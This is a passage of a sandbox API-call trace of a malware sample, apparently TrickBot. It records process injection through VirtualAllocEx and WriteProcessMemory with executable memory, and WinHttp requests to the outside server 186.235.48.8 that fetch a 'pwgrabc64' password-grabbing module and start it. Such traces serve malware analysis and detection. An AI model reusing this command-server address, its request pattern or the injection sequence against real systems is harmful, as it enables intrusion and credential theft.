lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.577] lstrlenA (lpString="dpost") returned 5 [0179.577] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x4a0000 [0179.578] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x4a0000, lpBuffer=0x32e49e60*, nSize=0x6, lpNumberOfBytesWritten=0xcda58 | out: lpBuffer=0x32e49e60*, lpNumberOfBytesWritten=0xcda58*=0x6) returned 1 [0179.579] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x204, flAllocationType=0x3000, flProtect=0x40) returned 0x4c0000 [0179.580] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x4c0000, lpBuffer=0x32a44010*, nSize=0x204, lpNumberOfBytesWritten=0xcda58 | out: lpBuffer=0x32a44010*, lpNumberOfBytesWritten=0xcda58*=0x204) returned 1 [0179.581] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x5d0000 [0179.581] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x5d0000, lpBuffer=0xcdcd0*, nSize=0x400, lpNumberOfBytesWritten=0xcda58 | out: lpBuffer=0xcdcd0*, lpNumberOfBytesWritten=0xcda58*=0x400) returned 1 [0179.583] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x5e0000 [0179.583] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x5e0000, lpBuffer=0xcdc50*, nSize=0x80, lpNumberOfBytesWritten=0xcda58 | out: lpBuffer=0xcdc50*, lpNumberOfBytesWritten=0xcda58*=0x80) returned 1 [0179.584] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x8a0000 [0179.584] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd9b0, nSize=0xd8, lpNumberOfBytesRead=0xcd968 | out: lpBuffer=0xcd9b0*, lpNumberOfBytesRead=0xcd968*=0xd8) returned 1 [0179.584] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x40) returned 0x8b0000 [0179.584] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x8b0000, lpBuffer=0x32e41a50*, nSize=0x58, lpNumberOfBytesWritten=0xcd968 | out: lpBuffer=0x32e41a50*, lpNumberOfBytesWritten=0xcd968*=0x58) returned 1 [0179.586] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd9b0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd968 | out: lpBuffer=0xcd9b0*, lpNumberOfBytesWritten=0xcd968*=0xd8) returned 1 [0179.587] ResetEvent (hEvent=0x580) returned 1 [0179.587] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0179.639] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd9b0, nSize=0xd8, lpNumberOfBytesRead=0xcd968 | out: lpBuffer=0xcd9b0*, lpNumberOfBytesRead=0xcd968*=0xd8) returned 1 [0179.639] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.639] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41a50 | out: hHeap=0x2150000) returned 1 [0179.639] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x5e0000, lpBuffer=0xcdc50, nSize=0x80, lpNumberOfBytesRead=0xcdab8 | out: lpBuffer=0xcdc50*, lpNumberOfBytesRead=0xcdab8*=0x80) returned 1 [0179.639] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x5d0000, lpBuffer=0xcdcd0, nSize=0x400, lpNumberOfBytesRead=0xcdab8 | out: lpBuffer=0xcdcd0*, lpNumberOfBytesRead=0xcdab8*=0x400) returned 1 [0179.639] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x8a0008, lpBuffer=0xcdb80, nSize=0x4, lpNumberOfBytesRead=0xcdab8 | out: lpBuffer=0xcdb80*, lpNumberOfBytesRead=0xcdab8*=0x4) returned 1 [0179.640] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.640] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.640] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x4c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.640] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x4a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.640] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44010 | out: hHeap=0x2150000) returned 1 [0179.641] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x4b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.641] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.641] WinHttpCloseHandle (hInternet=0x7b42c0) returned 1 [0179.641] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/10/62/BDPFPPJZRDXFLPBNF/1/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x7b42c0 [0179.641] WinHttpSetOption (hInternet=0x7b42c0, dwOption=0x1f, lpBuffer=0xce038, dwBufferLength=0x4) returned 1 [0179.641] WinHttpSendRequest (hRequest=0x7b42c0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0180.152] WinHttpReceiveResponse (hRequest=0x7b42c0, lpReserved=0x0) returned 1 [0180.152] WinHttpQueryHeaders (in: hRequest=0x7b42c0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xce034, lpdwBufferLength=0xce03c, lpdwIndex=0x0 | out: lpBuffer=0xce034*, lpdwBufferLength=0xce03c*=0x4, lpdwIndex=0x0) returned 1 [0180.152] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e69100 | out: hHeap=0x2150000) returned 1 [0180.154] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f4b0 [0180.154] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e66be0, Size=0x20) returned 0x32e6f690 [0180.154] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0180.154] GetTickCount () returned 0xebff62 [0180.154] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e407b0 [0180.154] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] GetTickCount () returned 0xebff62 [0180.155] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e4ff10 [0180.155] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407f0 | out: hHeap=0x2150000) returned 1 [0180.155] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e00 | out: hHeap=0x2150000) returned 1 [0180.155] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41410 | out: hHeap=0x2150000) returned 1 [0180.155] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41900 | out: hHeap=0x2150000) returned 1 [0180.155] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41490 | out: hHeap=0x2150000) returned 1 [0180.155] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e66f70 | out: hHeap=0x2150000) returned 1 [0180.155] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41900 [0180.155] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f20 [0180.155] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x70) returned 0x32e4ff50 [0180.155] GetTickCount () returned 0xebff62 [0180.155] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f7b0 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] GetTickCount () returned 0xebff62 [0180.156] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e407f0 [0180.156] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f420 [0180.156] StrStrIW (lpFirst="pwgrabc sTart", lpSrch=" ") returned=" sTart" [0180.156] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49fa0 [0180.156] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e00 [0180.156] StrStrIW (lpFirst="sTart", lpSrch=" ") returned 0x0 [0180.156] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49fa0, Size=0x10) returned 0x3234bad0 [0180.156] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b9f0 [0180.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sTart", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0180.156] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b7d0 [0180.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sTart", cchWideChar=-1, lpMultiByteStr=0x3234b7d0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sTart", lpUsedDefaultChar=0x0) returned 6 [0180.156] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f7e0 [0180.156] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f7e0 | out: hHeap=0x2150000) returned 1 [0180.157] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f4e0 [0180.157] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f4e0 | out: hHeap=0x2150000) returned 1 [0180.157] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fde0 [0180.157] WinHttpConnect (hSession=0x71b780, pswzServerName="186.235.48.8", nServerPort=0x1bb, dwReserved=0x0) returned 0x332be850 [0180.157] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f4e0 [0180.157] GetTickCount () returned 0xebff62 [0180.157] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40) returned 0x32e4ffd0 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.157] GetTickCount () returned 0xebff62 [0180.158] GetTickCount () returned 0xebff62 [0180.158] GetTickCount () returned 0xebff62 [0180.158] GetTickCount () returned 0xebff62 [0180.158] GetTickCount () returned 0xebff62 [0180.158] GetTickCount () returned 0xebff62 [0180.158] GetTickCount () returned 0xebff62 [0180.158] GetTickCount () returned 0xebff62 [0180.158] WinHttpOpenRequest (hConnect=0x332be850, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/5/pwgrabc64/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x332b3920 [0180.158] WinHttpSetOption (hInternet=0x332b3920, dwOption=0x1f, lpBuffer=0xcd638, dwBufferLength=0x4) returned 1 [0180.158] WinHttpSendRequest (hRequest=0x332b3920, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0180.773] WinHttpReceiveResponse (hRequest=0x332b3920, lpReserved=0x0) returned 1 [0180.773] WinHttpQueryHeaders (in: hRequest=0x332b3920, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xcd634, lpdwBufferLength=0xcd63c, lpdwIndex=0x0 | out: lpBuffer=0xcd634*, lpdwBufferLength=0xcd63c*=0x4, lpdwIndex=0x0) returned 1 [0180.773] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0xece) returned 1 [0180.773] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xed0) returned 0x32e786e0 [0180.773] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32e786e0, dwNumberOfBytesToRead=0xece, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e786e0*, lpdwNumberOfBytesRead=0xcd714*=0xece) returned 1 [0180.773] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0180.775] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e786e0, Size=0x2ed0) returned 0x32e786e0 [0180.775] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32e795ae, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e795ae*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0180.775] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x1030) returned 1 [0180.775] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e786e0, Size=0x3f00) returned 0x32e786e0 [0180.775] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32e7b5ae, dwNumberOfBytesToRead=0x1030, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e7b5ae*, lpdwNumberOfBytesRead=0xcd714*=0x1030) returned 1 [0180.775] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0180.776] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e786e0, Size=0x5f00) returned 0x32e786e0 [0180.776] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32e7c5de, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e7c5de*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0180.776] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0180.776] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e786e0, Size=0x7f00) returned 0x32e786e0 [0180.776] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32e7e5de, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e7e5de*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0180.776] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.241] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e786e0, Size=0x9f00) returned 0x32e82220 [0181.259] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32e8a11e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e8a11e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.260] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.263] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e82220, Size=0xbf00) returned 0x32e82220 [0181.263] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32e8c11e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32e8c11e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.263] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.270] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e82220, Size=0xdf00) returned 0x32ac5770 [0181.272] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32ad166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ad166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.272] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.273] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0xff00) returned 0x32ac5770 [0181.274] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32ad366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ad366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.274] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.274] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x11f00) returned 0x32ac5770 [0181.274] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32ad566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ad566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.274] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.274] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x13f00) returned 0x32ac5770 [0181.275] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32ad766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ad766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.275] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.275] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x15f00) returned 0x32ac5770 [0181.275] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32ad966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ad966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.275] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.276] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x17f00) returned 0x32ac5770 [0181.276] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32adb66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32adb66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.276] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.536] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x19f00) returned 0x32ac5770 [0181.536] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32add66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32add66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.537] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.537] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x1bf00) returned 0x32ac5770 [0181.537] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32adf66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32adf66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.537] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.537] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x1df00) returned 0x32ac5770 [0181.538] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32ae166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ae166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.538] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.538] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x1ff00) returned 0x32ac5770 [0181.538] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32ae366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ae366e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.538] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.538] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x21f00) returned 0x32ac5770 [0181.539] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32ae566e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ae566e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.539] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.539] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x23f00) returned 0x32ac5770 [0181.539] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32ae766e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ae766e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.539] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.539] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x25f00) returned 0x32ac5770 [0181.540] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32ae966e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32ae966e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.540] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.540] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x27f00) returned 0x32ac5770 [0181.540] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32aeb66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32aeb66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.540] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.830] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x29f00) returned 0x32ac5770 [0181.830] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32aed66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32aed66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.830] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.830] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x2bf00) returned 0x32ac5770 [0181.831] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32aef66e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32aef66e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.831] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.831] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x2df00) returned 0x32ac5770 [0181.831] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32af166e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32af166e*, lpdwNumberOfBytesRead=0xcd714*=0x2000) returned 1 [0181.831] WinHttpQueryDataAvailable (in: hRequest=0x332b3920, lpdwNumberOfBytesAvailable=0xcd710 | out: lpdwNumberOfBytesAvailable=0xcd710*=0x2000) returned 1 [0181.831] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32ac5770, Size=0x2ff00) returned 0x32ac5770 [0181.831] WinHttpReadData (in: hRequest=0x332b3920, lpBuffer=0x32af366e, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0xcd714 | out: lpBuffer=0x32af366e*, 